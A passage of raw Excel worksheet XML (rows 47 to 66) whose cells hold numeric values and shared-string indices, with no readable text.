      <c r="J47" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K47" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L47" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M47" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N47" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O47" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="Q47" s="12">
        <v>2.5</v>
      </c>
      <c r="R47" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S47" s="12" t="s">
        <v>611</v>
      </c>
      <c r="T47" s="12" t="s">
        <v>491</v>
      </c>
      <c r="U47" s="12" t="s">
        <v>612</v>
      </c>
      <c r="V47" s="12" t="s">
        <v>491</v>
      </c>
      <c r="W47" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X47" s="12">
        <v>4</v>
      </c>
      <c r="Y47" s="12" t="s">
        <v>613</v>
      </c>
    </row>
    <row r="48" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A48" s="12">
        <v>244</v>
      </c>
      <c r="B48" s="12" t="s">
        <v>28385</v>
      </c>
      <c r="D48" s="12" t="s">
        <v>28397</v>
      </c>
      <c r="F48" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G48" s="12" t="s">
        <v>614</v>
      </c>
      <c r="H48" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I48" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J48" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K48" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L48" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M48" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N48" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O48" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="Q48" s="12">
        <v>2.5</v>
      </c>
      <c r="R48" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S48" s="12" t="s">
        <v>615</v>
      </c>
      <c r="T48" s="12" t="s">
        <v>491</v>
      </c>
      <c r="U48" s="12" t="s">
        <v>616</v>
      </c>
      <c r="V48" s="12" t="s">
        <v>558</v>
      </c>
      <c r="W48" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X48" s="12">
        <v>2</v>
      </c>
      <c r="Y48" s="12" t="s">
        <v>617</v>
      </c>
    </row>
    <row r="49" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A49" s="12">
        <v>252</v>
      </c>
      <c r="B49" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C49" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D49" s="12" t="s">
        <v>28398</v>
      </c>
      <c r="E49" s="12" t="s">
        <v>31437</v>
      </c>
      <c r="F49" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G49" s="12" t="s">
        <v>618</v>
      </c>
      <c r="H49" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I49" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J49" s="12" t="s">
        <v>619</v>
      </c>
      <c r="K49" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L49" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M49" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N49" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O49" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="Q49" s="12">
        <v>2.5</v>
      </c>
      <c r="R49" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S49" s="12" t="s">
        <v>620</v>
      </c>
      <c r="T49" s="12" t="s">
        <v>491</v>
      </c>
      <c r="U49" s="12" t="s">
        <v>621</v>
      </c>
      <c r="V49" s="12" t="s">
        <v>622</v>
      </c>
      <c r="W49" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X49" s="12">
        <v>9</v>
      </c>
      <c r="Y49" s="12" t="s">
        <v>623</v>
      </c>
    </row>
    <row r="50" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A50" s="12">
        <v>253</v>
      </c>
      <c r="B50" s="12" t="s">
        <v>28399</v>
      </c>
      <c r="C50" s="12" t="s">
        <v>28400</v>
      </c>
      <c r="D50" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F50" s="12" t="s">
        <v>29736</v>
      </c>
      <c r="G50" s="12" t="s">
        <v>624</v>
      </c>
      <c r="H50" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I50" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J50" s="12" t="s">
        <v>619</v>
      </c>
      <c r="K50" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L50" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M50" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N50" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O50" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="Q50" s="12">
        <v>2.5</v>
      </c>
      <c r="R50" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S50" s="12" t="s">
        <v>625</v>
      </c>
      <c r="T50" s="12" t="s">
        <v>491</v>
      </c>
      <c r="U50" s="12" t="s">
        <v>626</v>
      </c>
      <c r="V50" s="12" t="s">
        <v>622</v>
      </c>
      <c r="W50" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X50" s="12">
        <v>1</v>
      </c>
      <c r="Y50" s="12" t="s">
        <v>627</v>
      </c>
    </row>
    <row r="51" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A51" s="12">
        <v>254</v>
      </c>
      <c r="B51" s="12" t="s">
        <v>28399</v>
      </c>
      <c r="C51" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D51" s="12" t="s">
        <v>28401</v>
      </c>
      <c r="F51" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G51" s="12" t="s">
        <v>628</v>
      </c>
      <c r="H51" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I51" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J51" s="12" t="s">
        <v>619</v>
      </c>
      <c r="K51" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L51" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M51" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N51" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O51" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="Q51" s="12">
        <v>2.5</v>
      </c>
      <c r="R51" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S51" s="12" t="s">
        <v>629</v>
      </c>
      <c r="T51" s="12" t="s">
        <v>491</v>
      </c>
      <c r="U51" s="12" t="s">
        <v>626</v>
      </c>
      <c r="V51" s="12" t="s">
        <v>622</v>
      </c>
      <c r="W51" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X51" s="12">
        <v>2</v>
      </c>
      <c r="Y51" s="12" t="s">
        <v>630</v>
      </c>
    </row>
    <row r="52" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A52" s="12">
        <v>255</v>
      </c>
      <c r="B52" s="12" t="s">
        <v>28402</v>
      </c>
      <c r="C52" s="12" t="s">
        <v>28403</v>
      </c>
      <c r="D52" s="12" t="s">
        <v>28404</v>
      </c>
      <c r="F52" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G52" s="12" t="s">
        <v>28256</v>
      </c>
      <c r="H52" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I52" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J52" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K52" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L52" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M52" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N52" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O52" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="Q52" s="12">
        <v>2.5</v>
      </c>
      <c r="R52" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S52" s="12" t="s">
        <v>631</v>
      </c>
      <c r="T52" s="12" t="s">
        <v>491</v>
      </c>
      <c r="U52" s="12" t="s">
        <v>632</v>
      </c>
      <c r="V52" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W52" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X52" s="12">
        <v>0</v>
      </c>
      <c r="Y52" s="12" t="s">
        <v>633</v>
      </c>
    </row>
    <row r="53" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A53" s="12">
        <v>265</v>
      </c>
      <c r="B53" s="12" t="s">
        <v>28405</v>
      </c>
      <c r="C53" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D53" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F53" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G53" s="12" t="s">
        <v>653</v>
      </c>
      <c r="H53" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I53" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J53" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K53" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L53" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M53" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N53" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O53" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P53" s="12" t="s">
        <v>654</v>
      </c>
      <c r="Q53" s="12">
        <v>2.5</v>
      </c>
      <c r="R53" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S53" s="12" t="s">
        <v>655</v>
      </c>
      <c r="T53" s="12" t="s">
        <v>656</v>
      </c>
      <c r="U53" s="12" t="s">
        <v>657</v>
      </c>
      <c r="V53" s="12" t="s">
        <v>202</v>
      </c>
      <c r="W53" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X53" s="12">
        <v>5</v>
      </c>
      <c r="Y53" s="12" t="s">
        <v>658</v>
      </c>
    </row>
    <row r="54" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A54" s="12">
        <v>270</v>
      </c>
      <c r="B54" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D54" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F54" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G54" s="12" t="s">
        <v>669</v>
      </c>
      <c r="H54" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I54" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J54" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K54" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L54" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M54" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N54" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O54" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="Q54" s="12">
        <v>2.5</v>
      </c>
      <c r="R54" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S54" s="12" t="s">
        <v>670</v>
      </c>
      <c r="T54" s="12" t="s">
        <v>482</v>
      </c>
      <c r="U54" s="12" t="s">
        <v>671</v>
      </c>
      <c r="V54" s="12" t="s">
        <v>114</v>
      </c>
      <c r="W54" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X54" s="12">
        <v>1</v>
      </c>
      <c r="Y54" s="12" t="s">
        <v>672</v>
      </c>
    </row>
    <row r="55" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A55" s="12">
        <v>272</v>
      </c>
      <c r="B55" s="12" t="s">
        <v>28408</v>
      </c>
      <c r="C55" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D55" s="12" t="s">
        <v>28409</v>
      </c>
      <c r="F55" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G55" s="12" t="s">
        <v>678</v>
      </c>
      <c r="H55" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I55" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J55" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K55" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L55" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M55" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N55" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O55" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P55" s="12" t="s">
        <v>679</v>
      </c>
      <c r="Q55" s="12">
        <v>2.5</v>
      </c>
      <c r="R55" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S55" s="12" t="s">
        <v>680</v>
      </c>
      <c r="T55" s="12" t="s">
        <v>441</v>
      </c>
      <c r="U55" s="12" t="s">
        <v>661</v>
      </c>
      <c r="V55" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W55" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X55" s="12">
        <v>1</v>
      </c>
      <c r="Y55" s="12" t="s">
        <v>681</v>
      </c>
    </row>
    <row r="56" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A56" s="12">
        <v>274</v>
      </c>
      <c r="B56" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C56" s="12" t="s">
        <v>28361</v>
      </c>
      <c r="D56" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F56" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G56" s="12" t="s">
        <v>682</v>
      </c>
      <c r="H56" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I56" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J56" s="12" t="s">
        <v>683</v>
      </c>
      <c r="K56" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L56" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M56" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N56" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O56" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P56" s="12" t="s">
        <v>684</v>
      </c>
      <c r="Q56" s="12">
        <v>2.5</v>
      </c>
      <c r="R56" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S56" s="12" t="s">
        <v>685</v>
      </c>
      <c r="T56" s="12" t="s">
        <v>68</v>
      </c>
      <c r="U56" s="12" t="s">
        <v>686</v>
      </c>
      <c r="V56" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W56" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X56" s="12">
        <v>1</v>
      </c>
      <c r="Y56" s="12" t="s">
        <v>687</v>
      </c>
    </row>
    <row r="57" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A57" s="12">
        <v>275</v>
      </c>
      <c r="B57" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D57" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F57" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G57" s="12" t="s">
        <v>688</v>
      </c>
      <c r="H57" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I57" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J57" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K57" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L57" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M57" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N57" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O57" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P57" s="12" t="s">
        <v>689</v>
      </c>
      <c r="Q57" s="12">
        <v>2.5</v>
      </c>
      <c r="R57" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S57" s="12" t="s">
        <v>690</v>
      </c>
      <c r="T57" s="12" t="s">
        <v>68</v>
      </c>
      <c r="U57" s="12" t="s">
        <v>691</v>
      </c>
      <c r="V57" s="12" t="s">
        <v>114</v>
      </c>
      <c r="W57" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X57" s="12">
        <v>1</v>
      </c>
      <c r="Y57" s="12" t="s">
        <v>692</v>
      </c>
    </row>
    <row r="58" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A58" s="12">
        <v>276</v>
      </c>
      <c r="B58" s="12" t="s">
        <v>28410</v>
      </c>
      <c r="D58" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F58" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G58" s="12" t="s">
        <v>693</v>
      </c>
      <c r="H58" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I58" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J58" s="12" t="s">
        <v>182</v>
      </c>
      <c r="K58" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L58" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M58" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N58" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O58" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P58" s="12" t="s">
        <v>689</v>
      </c>
      <c r="Q58" s="12">
        <v>2.5</v>
      </c>
      <c r="R58" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S58" s="12" t="s">
        <v>694</v>
      </c>
      <c r="T58" s="12" t="s">
        <v>68</v>
      </c>
      <c r="U58" s="12" t="s">
        <v>695</v>
      </c>
      <c r="V58" s="12" t="s">
        <v>400</v>
      </c>
      <c r="W58" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X58" s="12">
        <v>8</v>
      </c>
      <c r="Y58" s="12" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="59" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A59" s="12">
        <v>280</v>
      </c>
      <c r="B59" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C59" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D59" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E59" s="12" t="s">
        <v>31438</v>
      </c>
      <c r="F59" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G59" s="12" t="s">
        <v>697</v>
      </c>
      <c r="H59" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I59" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J59" s="12" t="s">
        <v>36</v>
      </c>
      <c r="K59" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L59" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M59" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N59" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O59" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P59" s="12" t="s">
        <v>698</v>
      </c>
      <c r="Q59" s="12">
        <v>2.5</v>
      </c>
      <c r="R59" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S59" s="12" t="s">
        <v>699</v>
      </c>
      <c r="T59" s="12" t="s">
        <v>700</v>
      </c>
      <c r="U59" s="12" t="s">
        <v>237</v>
      </c>
      <c r="V59" s="12" t="s">
        <v>39</v>
      </c>
      <c r="W59" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X59" s="12">
        <v>16</v>
      </c>
      <c r="Y59" s="12" t="s">
        <v>701</v>
      </c>
    </row>
    <row r="60" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A60" s="12">
        <v>282</v>
      </c>
      <c r="B60" s="12" t="s">
        <v>28411</v>
      </c>
      <c r="D60" s="12" t="s">
        <v>28412</v>
      </c>
      <c r="E60" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F60" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G60" s="12" t="s">
        <v>707</v>
      </c>
      <c r="H60" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I60" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J60" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K60" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L60" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M60" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N60" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O60" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P60" s="12" t="s">
        <v>708</v>
      </c>
      <c r="Q60" s="12">
        <v>2.5</v>
      </c>
      <c r="R60" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S60" s="12" t="s">
        <v>709</v>
      </c>
      <c r="T60" s="12" t="s">
        <v>93</v>
      </c>
      <c r="U60" s="12" t="s">
        <v>710</v>
      </c>
      <c r="V60" s="12" t="s">
        <v>491</v>
      </c>
      <c r="W60" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X60" s="12">
        <v>5</v>
      </c>
      <c r="Y60" s="12" t="s">
        <v>711</v>
      </c>
    </row>
    <row r="61" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A61" s="12">
        <v>286</v>
      </c>
      <c r="B61" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C61" s="12" t="s">
        <v>28260</v>
      </c>
      <c r="D61" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E61" s="12" t="s">
        <v>31440</v>
      </c>
      <c r="F61" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G61" s="12" t="s">
        <v>717</v>
      </c>
      <c r="H61" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I61" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J61" s="12" t="s">
        <v>683</v>
      </c>
      <c r="K61" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L61" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M61" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N61" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O61" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P61" s="12" t="s">
        <v>698</v>
      </c>
      <c r="Q61" s="12">
        <v>2.5</v>
      </c>
      <c r="R61" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S61" s="12" t="s">
        <v>718</v>
      </c>
      <c r="T61" s="12" t="s">
        <v>719</v>
      </c>
      <c r="U61" s="12" t="s">
        <v>720</v>
      </c>
      <c r="V61" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W61" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X61" s="12">
        <v>3</v>
      </c>
      <c r="Y61" s="12" t="s">
        <v>721</v>
      </c>
    </row>
    <row r="62" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A62" s="12">
        <v>287</v>
      </c>
      <c r="B62" s="12" t="s">
        <v>28413</v>
      </c>
      <c r="D62" s="12" t="s">
        <v>31441</v>
      </c>
      <c r="F62" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G62" s="12" t="s">
        <v>722</v>
      </c>
      <c r="H62" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I62" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J62" s="12" t="s">
        <v>129</v>
      </c>
      <c r="K62" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L62" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M62" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N62" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O62" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P62" s="12" t="s">
        <v>723</v>
      </c>
      <c r="Q62" s="12">
        <v>2.5</v>
      </c>
      <c r="R62" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S62" s="12" t="s">
        <v>724</v>
      </c>
      <c r="T62" s="12" t="s">
        <v>68</v>
      </c>
      <c r="U62" s="12" t="s">
        <v>725</v>
      </c>
      <c r="V62" s="12" t="s">
        <v>400</v>
      </c>
      <c r="W62" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X62" s="12">
        <v>3</v>
      </c>
      <c r="Y62" s="12" t="s">
        <v>726</v>
      </c>
    </row>
    <row r="63" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A63" s="12">
        <v>292</v>
      </c>
      <c r="B63" s="12" t="s">
        <v>28385</v>
      </c>
      <c r="D63" s="12" t="s">
        <v>28394</v>
      </c>
      <c r="E63" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F63" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G63" s="12" t="s">
        <v>737</v>
      </c>
      <c r="H63" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I63" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J63" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K63" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L63" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M63" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N63" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O63" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P63" s="12" t="s">
        <v>738</v>
      </c>
      <c r="Q63" s="12">
        <v>2.5</v>
      </c>
      <c r="R63" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S63" s="12" t="s">
        <v>739</v>
      </c>
      <c r="T63" s="12" t="s">
        <v>740</v>
      </c>
      <c r="U63" s="12" t="s">
        <v>741</v>
      </c>
      <c r="V63" s="12" t="s">
        <v>179</v>
      </c>
      <c r="W63" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X63" s="12">
        <v>3</v>
      </c>
      <c r="Y63" s="12" t="s">
        <v>742</v>
      </c>
    </row>
    <row r="64" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A64" s="12">
        <v>293</v>
      </c>
      <c r="B64" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C64" s="12" t="s">
        <v>28414</v>
      </c>
      <c r="D64" s="12" t="s">
        <v>28386</v>
      </c>
      <c r="F64" s="12" t="s">
        <v>29737</v>
      </c>
      <c r="G64" s="12" t="s">
        <v>743</v>
      </c>
      <c r="H64" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I64" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J64" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K64" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L64" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M64" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N64" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O64" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P64" s="12" t="s">
        <v>745</v>
      </c>
      <c r="Q64" s="12">
        <v>2.5</v>
      </c>
      <c r="R64" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S64" s="12" t="s">
        <v>746</v>
      </c>
      <c r="T64" s="12" t="s">
        <v>740</v>
      </c>
      <c r="U64" s="12" t="s">
        <v>747</v>
      </c>
      <c r="V64" s="12" t="s">
        <v>202</v>
      </c>
      <c r="W64" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X64" s="12">
        <v>12</v>
      </c>
      <c r="Y64" s="12" t="s">
        <v>748</v>
      </c>
    </row>
    <row r="65" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A65" s="12">
        <v>295</v>
      </c>
      <c r="B65" s="12" t="s">
        <v>28415</v>
      </c>
      <c r="D65" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F65" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G65" s="12" t="s">
        <v>749</v>
      </c>
      <c r="H65" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I65" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J65" s="12" t="s">
        <v>166</v>
      </c>
      <c r="K65" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L65" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M65" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N65" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O65" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P65" s="12" t="s">
        <v>708</v>
      </c>
      <c r="Q65" s="12">
        <v>2.5</v>
      </c>
      <c r="R65" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S65" s="12" t="s">
        <v>750</v>
      </c>
      <c r="T65" s="12" t="s">
        <v>391</v>
      </c>
      <c r="U65" s="12" t="s">
        <v>751</v>
      </c>
      <c r="V65" s="12" t="s">
        <v>167</v>
      </c>
      <c r="W65" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X65" s="12">
        <v>7</v>
      </c>
      <c r="Y65" s="12" t="s">
        <v>752</v>
      </c>
    </row>
    <row r="66" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A66" s="12">
        <v>299</v>
      </c>
      <c r="B66" s="12" t="s">
        <v>28416</v>
      </c>
      <c r="D66" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F66" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G66" s="12" t="s">
        <v>753</v>
      </c>
      <c r="H66" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I66" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J66" s="12" t="s">
        <v>754</v>
      </c>
      <c r="K66" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L66" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M66" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N66" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O66" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P66" s="12" t="s">
        <v>708</v>
      </c>
      <c r="Q66" s="12">
        <v>2.5</v>
      </c>
      <c r="R66" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S66" s="12" t="s">
        <v>755</v>
      </c>
      <c r="T66" s="12" t="s">
